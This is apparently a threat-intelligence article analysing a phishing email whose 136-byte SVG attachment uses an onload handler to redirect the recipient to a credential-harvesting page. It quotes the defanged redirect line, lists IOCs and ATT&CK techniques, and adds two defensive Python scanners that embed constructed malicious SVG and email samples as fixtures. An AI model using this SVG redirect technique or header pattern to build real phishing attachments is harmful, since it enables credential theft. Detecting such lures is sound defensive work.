The subject line referenced an ACH payment from "Hauck, Schumm and Carter." The body contained zero payment details. No amount, no routing number, no invoice reference. Just a disclaimer paragraph and a Mimecast scan notice declaring the message safe. The entire payload lived inside a 136-byte SVG attachment.
That file was small enough to fit in a tweet. It contained one line of JavaScript.
The Smallest Payload in the Queue
Open the SVG in a browser, and the onload event fires immediately: window.location='hxxps://cic-news[.]ca/dontcare/#[recipient-token]'. No rendering. No image. No user interaction required beyond double-clicking the file. The browser redirects to a credential harvesting page, with the recipient's email address appended as a URL fragment so the landing page can pre-populate the login form.
At 136 bytes, this attachment is deliberately minimal. It contains no embedded images, no styling, no viewBox attribute. Static file scanners that look for suspicious content patterns (embedded forms, obfuscated scripts, external resource loading) find almost nothing to evaluate. The file is so small that heuristic engines designed for complex payloads may skip it entirely. The JavaScript is a single assignment statement, not a multi-stage decoder chain, so it stays below the complexity threshold at which most sandbox heuristics raise a flag.
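The defensive takeaway from the two paragraphs above is that an SVG verdict has to be keyed on content, not on byte count or on the presence of "complex" patterns. The following scanner is an added example written for this article, not tooling from the original post or from any vendor it mentions: it walks every element of an SVG and reports script elements, on* event-handler attributes, and javascript: or remote href values, so a one-attribute file is flagged exactly like a heavily obfuscated one. The two sample files are constructed to match the shape of the attachment described (the URL and token are placeholders, and the function and constant names are assumptions). It uses the standard-library parser for brevity; on untrusted mail attachments a production scanner should use defusedxml or disable entity expansion.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of the attachment described above
# (not the original file): one root element whose onload handler
# redirects the browser; the URL and the appended token are placeholders.
SUSPECT_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" '
    b"onload=\"window.location='https://landing.example/#user@example.com'\"/>"
)

# Constructed benign control: a plain icon with no scripting at all.
BENIGN_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
    b'<rect width="10" height="10" fill="#09f"/></svg>'
)

# Elements that can host script or arbitrary HTML inside an SVG document.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe"}


def _local(name: str) -> str:
    """Strip an XML namespace prefix of the form {uri}name."""
    return name.rsplit("}", 1)[-1]


def svg_active_content(data: bytes) -> list:
    """Return active-content findings for an SVG, independent of its size.

    Every element is checked for script-capable tags, for any on* event
    handler attribute, and for href values that are javascript: URIs or
    remote fetches. An empty list means nothing active was found; it is
    not a statement that the file is safe.
    NOTE: xml.etree is not hardened against entity-expansion attacks;
    use defusedxml for real attachment scanning.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"parse-error:{exc}"]
    findings = []
    for el in root.iter():
        if not isinstance(el.tag, str):
            continue  # comments and processing instructions have no tag name
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"element:{tag}")
        for attr, value in el.attrib.items():
            name = _local(attr)
            v = value.strip().lower()
            if name.lower().startswith("on"):
                findings.append(f"handler:{tag}@{name}")
            elif name == "href" and v.startswith("javascript:"):
                findings.append(f"javascript-uri:{tag}@{name}")
            elif name == "href" and v.startswith(("http://", "https://")):
                findings.append(f"external-ref:{tag}@{name}")
    return findings


def should_quarantine(data: bytes) -> bool:
    """Quarantine decision keyed on content, never on byte count."""
    return bool(svg_active_content(data))


if __name__ == "__main__":
    for label, blob in (("suspect", SUSPECT_SVG), ("benign", BENIGN_SVG)):
        print(f"{label}: {len(blob)} bytes -> {svg_active_content(blob)}")
```

Run as a script it prints one finding for the constructed 109-byte file and none for the icon. The point of the design is that the decision path is identical for both: there is no minimum size below which the file is waved through, and a single onload attribute on the root element is sufficient on its own to quarantine.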
An Email With Nothing Inside
The email body itself was a study in minimalism. A boilerplate corporate disclaimer about confidentiality and intended recipients. A Mimecast scan notice. No salutation, no message content, no payment instructions. The subject line did all the social engineering work, creating an expectation of financial content that could only be satisfied by opening the attachment.
This pattern inverts the typical phishing structure. Most lures put the social engineering in the body and hide the payload behind a link or button. Here, the body was intentionally empty so that the attachment became the only actionable element. The recipient either opens the SVG or ignores the email entirely. There is no middle ground, no link to hover over, no button text to scrutinize.
The authentication picture reinforced the suspicion. SPF failed for the sending IP 178[.]211[.]155[.]35, which resolved to a deltahost PTR record in Frankfurt. No DKIM signature was present. No DMARC record existed for the sender domain. The Return-Path was empty, and the Message-ID referenced localhost, a header combination that no legitimate payment processor would produce.
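The header combination in the paragraph above (SPF fail, no DKIM, no DMARC, empty Return-Path, localhost Message-ID, and an SVG attachment) is easy to turn into a deterministic triage rule. The following is an added example written for this article, not the original post's detection logic: it parses a message with Python's standard email module and surfaces each of those signals. The raw message is constructed to reproduce that header shape; the addresses, IP, boundary and function name are placeholders and assumptions.

```python
import re
from email import message_from_bytes, policy

# Constructed sample reproducing the header combination described above
# (not the original message; addresses, IP, boundary and file name are placeholders).
RAW_MESSAGE = b"""\
Return-Path: <>
Authentication-Results: mx.example.com;
 spf=fail (sender IP 203.0.113.5) smtp.mailfrom=billing.example;
 dkim=none; dmarc=none header.from=billing.example
Message-ID: <20240101120000.1234@localhost>
From: Accounts Payable <ap@billing.example>
To: recipient@example.com
Subject: ACH Payment Remittance
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

This message is intended only for the named recipient.
--b1
Content-Type: image/svg+xml; name="remittance.svg"
Content-Disposition: attachment; filename="remittance.svg"

<svg xmlns="http://www.w3.org/2000/svg" onload="window.location='https://landing.example/#t'"/>
--b1--
"""

# method=result pairs as written by the receiving MTA into Authentication-Results
AUTH_RESULT = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)")


def header_anomalies(raw: bytes) -> list:
    """Return the list of sender-trust anomalies found in a raw RFC 5322 message."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []

    # 1. Authentication-Results: anything other than pass is surfaced, including
    #    "none", which is what a missing DKIM signature or DMARC record produces.
    auth = str(msg.get("Authentication-Results", "")).lower()
    for method, result in AUTH_RESULT.findall(auth):
        if result != "pass":
            findings.append(f"{method}:{result}")

    # 2. Null return path: no bounce address. A billing platform wants bounces back.
    return_path = str(msg.get("Return-Path", "")).strip()
    if return_path in ("", "<>"):
        findings.append("null-return-path")

    # 3. Message-ID should carry a routable domain after the '@'.
    mid = str(msg.get("Message-ID", "")).strip().strip("<>")
    host = mid.rsplit("@", 1)[-1].lower() if "@" in mid else ""
    if host in ("", "localhost") or "." not in host:
        findings.append(f"message-id-host:{host or 'missing'}")

    # 4. SVG attachments can carry script; record them regardless of size.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if part.get_content_type() == "image/svg+xml" or name.endswith(".svg"):
            findings.append(f"svg-attachment:{name or 'unnamed'}")

    return findings


if __name__ == "__main__":
    for finding in header_anomalies(RAW_MESSAGE):
        print(finding)
```

Any one of these signals occurs in legitimate mail now and then; the value is in the conjunction. A rule that quarantines when an SVG attachment arrives alongside a failed or absent authentication result and a null Return-Path catches this message without touching the image attachments that design teams send each other.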
Indicators of Compromise
| Type | Indicator | Context |
|---|---|---|
| URL | hxxps://cic-news[.]ca/dontcare/#[recipient-token] | Credential harvesting redirect destination |
| Domain | cic-news[.]ca | Landing page domain (IP: 104[.]198[.]174[.]130, no SPF/DMARC, no DNSSEC) |
| Sending IP | 178[.]211[.]155[.]35 | Deltahost PTR, Frankfurt |
| Hash (MD5) | 9cf631dbe76de7121fb96306c2473008 | SVG attachment |
| Header | Empty Return-Path, localhost Message-ID | Null sender, non-routable Message-ID |
MITRE ATT&CK Mapping
| Technique | ID | Context |
|---|---|---|
| Phishing: Spearphishing Attachment | T1566.001 | SVG attachment delivered via ACH remittance lure |
| User Execution: Malicious File | T1204.002 | SVG onload event triggers browser redirect on file open |
| Masquerading: Match Legitimate Name or Location | T1036.005 | Subject line references plausible business entity for payment context |